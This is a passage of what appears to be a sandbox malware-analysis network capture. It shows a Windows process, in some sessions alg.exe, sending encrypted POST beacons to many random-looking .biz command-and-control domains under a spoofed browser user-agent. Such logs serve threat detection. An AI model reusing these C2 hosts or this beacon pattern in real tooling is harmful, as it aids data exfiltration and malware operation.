                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.011154890 CET778OUTData Raw: b4 08 a6 af db b1 8e 89 fe 02 00 00 a1 5d 9c ae 98 fc 41 82 56 3b 56 a2 6f de 78 d2 75 49 3a 87 92 c7 94 63 df da fd 51 74 fc 35 33 3d 9e ef cc 96 fd 94 15 bc 28 8e 26 43 33 9d 39 8a 20 4b 3d 98 62 3c f6 9d 7f aa 10 c6 d7 7b fc 61 8f a2 0f 34 c6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ]AV;VoxuI:cQt53=(&C39 K=b<{a4f>({H&rRZ5MgbWi@ho?QKj :f,XpRY4JKLde 9EL:7wZjhdF5%Z~}EZ
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.973691940 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:07 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b8c1f10eb70777738ccb4aa24d0e646c|155.94.241.187|1731920347|1731920347|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        84192.168.2.105006344.221.84.10580
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.494666100 CET354OUTPOST /ybnjtwgoi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:07.494680882 CET834OUTData Raw: 08 f9 59 15 fc e3 8c e7 36 03 00 00 35 f7 6a aa 86 8e 84 10 d7 86 03 62 c5 59 4a f8 51 97 3e ed 9f ce a8 73 7e 25 cb 81 f0 4c 10 77 ed 8b 4f b4 03 81 0d 3a 0b 7d a1 c1 82 4a d3 a7 36 0e 46 17 6c 66 75 6e 9f 63 d2 de 34 28 77 dd bf 41 9a ce 28 af
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Y65jbYJQ>s~%LwO:}J6Flfunc4(wA(/hRp=*z9crzT-X(K6WX4*Q~3Y_<R~MCe>VqLvY h0gxZvJ8$dY`xsarO:
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.181231976 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=dd7dddd566ad2e8dd1403e9174177616|155.94.241.187|1731920348|1731920348|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        85192.168.2.105006454.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.200452089 CET345OUTPOST /u HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.200474977 CET834OUTData Raw: 00 1a 09 33 c6 0e a1 55 36 03 00 00 92 2d db 88 b7 7f 5a f3 7c c7 9c 7b d5 a4 62 17 40 cc a7 01 40 25 8a 8c f9 0a 0c 28 4b 12 d8 51 27 6e 73 98 71 49 29 06 02 94 d5 05 86 c5 bb 31 1f b8 93 30 dd 72 5b af c5 f5 28 e8 b3 fd c7 a6 39 82 8f d5 6e 5c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 3U6-Z|{b@@%(KQ'nsqI)10r[(9n\Q@K~y_bhHY'}t0_cz>0:Y];H"oM<%G%V,,=dPLkJa=?He=L469)M%O'@dNcuNWc4;Bz
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.034887075 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:08 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7be0bb28e668f0b281913246f1e2620b|155.94.241.187|1731920348|1731920348|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        86192.168.2.105006518.141.10.107807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.456629992 CET354OUTPOST /avkhmehufii HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:08.456629992 CET778OUTData Raw: 88 0a 24 a8 8f ae 46 50 fe 02 00 00 2d 54 55 bb c1 61 77 cf af 7c bb 6b e5 20 fc b6 3d 75 ff c0 4c b6 52 75 b5 13 4e 0f 04 45 57 55 67 34 46 14 67 e6 b9 6e bb 50 58 8b 99 23 63 eb 68 87 7c b5 4c 38 af d9 94 54 59 db d3 42 e8 dc f5 59 3b 22 7c d7
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $FP-TUaw|k =uLRuNEWUg4FgnPX#ch|L8TYBY;"|z`}h`XrI{BAe8MRYQ"ml+Cbr?YccD"(3SN3d)y^z|!nSERFL*@X0+^}g:I
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.911253929 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=93a01e6c148b570e5a2719b01addbbf1|155.94.241.187|1731920349|1731920349|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        87192.168.2.105006635.164.78.20080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.095609903 CET348OUTPOST /bsnsmn HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.095609903 CET834OUTData Raw: 29 d2 37 da aa 7f e3 00 36 03 00 00 eb 2c 95 35 10 c5 95 f4 0e 65 34 d7 71 65 43 23 c7 d6 1a 0e cc 40 16 59 0e 29 0b 53 88 2f 41 30 9b 2b 0c c1 1c 7e 9b 4a 01 56 c1 7f 03 e9 15 4b 0e 4c 52 3c 6f 14 1c 7a 21 7c 0c 52 7c fe 07 59 0d c8 51 57 f3 b6
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: )76,5e4qeC#@Y)S/A0+~JVKLR<oz!|R|YQWpT&?`E)G}D^jqqWnWk,mDn[.rnz IEPDM)u<2@{~#6%HKZvR"KE^gl-@I^E[>[n
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.915406942 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:09 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=d3503357ee3f4a43b33b36b643f82cfe|155.94.241.187|1731920349|1731920349|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        88192.168.2.10500673.94.10.3480
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.969805002 CET349OUTPOST /awlv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: ytctnunms.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:09.969827890 CET834OUTData Raw: 53 8a 65 82 8f ef 26 aa 36 03 00 00 4d 5d 06 e9 1b 2b 1c 5d cf 0e 60 c2 4b 51 fa 95 43 b4 c8 1e d8 f1 d9 5e a8 29 d2 06 90 80 52 d6 ef 41 4f 3a f2 3e f3 e4 4f 39 65 75 0c 17 78 38 5c 07 b6 75 cf 34 5f ae bc 11 99 3f 09 29 a5 13 53 e3 63 16 05 11
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Se&6M]+]`KQC^)RAO:>O9eux8\u4_?)Sc2zWFuLB:GP%;D?;han8 /cz:R(Z.sMrA[JE?[Doi:fI*[A(>iG;N~U
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.605551004 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:10 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=cb6166011a29e120f7e2ad454fba373a|155.94.241.187|1731920350|1731920350|0|1|0; path=/; domain=.ytctnunms.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        89192.168.2.1050068165.160.15.2080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.622685909 CET347OUTPOST /bhirak HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.622700930 CET834OUTData Raw: e5 1b d8 b4 51 9a 55 91 36 03 00 00 b4 cc 59 37 cc 74 1e e0 29 d5 0a eb 7c 7d 77 bd e2 1a 57 d3 7f bc 9b d1 7f 2e 0a 59 40 c0 45 4d 56 e4 bf 9e a6 97 b4 33 c0 fa d9 c7 98 46 c2 f1 03 c3 17 5c d2 fa 66 44 e9 06 16 8c 0e 1b 54 2c b5 74 c3 ec 66 21
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: QU6Y7t)|}wW.Y@EMV3F\fDT,tf!cACjB*/4`]A`*J~j)Gax}DrFME> .'U<M5LNUbeBaBFv@J\&E\z^#.SY?D6y?/b$q1f`j
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.355098009 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.358951092 CET344OUTPOST /lje HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: myups.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.358983040 CET834OUTData Raw: 42 cd c6 bd 22 46 50 86 36 03 00 00 ed ef 5b 01 2f 20 f1 73 e8 11 3c 23 19 6b 86 36 b8 b2 87 9a 64 6f 2f cd 9e 03 25 e8 5b 7e 43 4f b5 59 b9 74 5e 9c ad 84 48 f8 fe 43 57 52 2c 1e e5 4b 06 7e 73 ba 7e 57 3b da be 8f ec dd bb eb 02 be cd d1 24 70
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: B"FP6[/ s<#k6do/%[~COYt^HCWR,K~s~W;$p5z!ZPjI;n7u-%Qb~0o:;>AXQET_e?Y$"h^u2mq?$L 7|4H5@W0y@(Kf_lB8F
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:11.536428928 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 94
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        90192.168.2.105006913.251.16.150807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.647481918 CET352OUTPOST /cckxgccommw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:10.647644997 CET778OUTData Raw: b9 be 90 aa 16 57 fa 0d fe 02 00 00 6e 67 af ff ce ee b6 9a 10 78 d9 42 8b 4e fd 46 6d 41 02 9f 13 12 35 e7 62 d7 17 52 80 71 40 78 4b 95 15 9d 4a 0f 01 ef 1a 53 fc 85 b0 69 2f a3 e9 7d 6c f2 ca 9d a8 1d d5 53 ec 7b a7 80 73 b1 e6 2b 45 28 00 8d
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: WngxBNFmA5bRq@xKJSi/}lS{s+E(OFv0S4@z<sLY=*l(=K: w5dd#x[6W"2,=]lO(+!qbP??4Ewb1:B,B&f~`z.
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.090563059 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:11 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=02e55fb88856d24c844e165538abe382|155.94.241.187|1731920351|1731920351|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        91192.168.2.105007054.244.188.17780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.413577080 CET359OUTPOST /aykeetjatrhfhv HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.413577080 CET834OUTData Raw: ce e5 2c e4 80 11 1f e8 36 03 00 00 8e 1b cb 37 21 5a ff 66 53 eb c1 c2 05 e3 c3 fe 0a 93 3f c6 a8 5e 1d 07 cb c8 ce 56 6f 70 ae 03 56 90 bf e6 a1 e0 f3 0f e8 4b 04 b1 cc 00 9b 98 6a 08 a5 93 6e 6a f6 a6 42 00 bb e5 89 de e2 84 9d 3f 11 f8 dd 92
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,67!ZfS?^VopVKjnjB?G;L'|BDX%>lc4`ZPi8]K-UlAma+P"@+yPuNq2q/SyP Z]"2M6c"?\X[unNGa5/
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:13.249610901 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:13 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=b3603bdb3233f526546a4d01b2b56f1a|155.94.241.187|1731920353|1731920353|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        92192.168.2.105007118.208.156.248807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:12.678416014 CET352OUTPOST /fddxbhb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
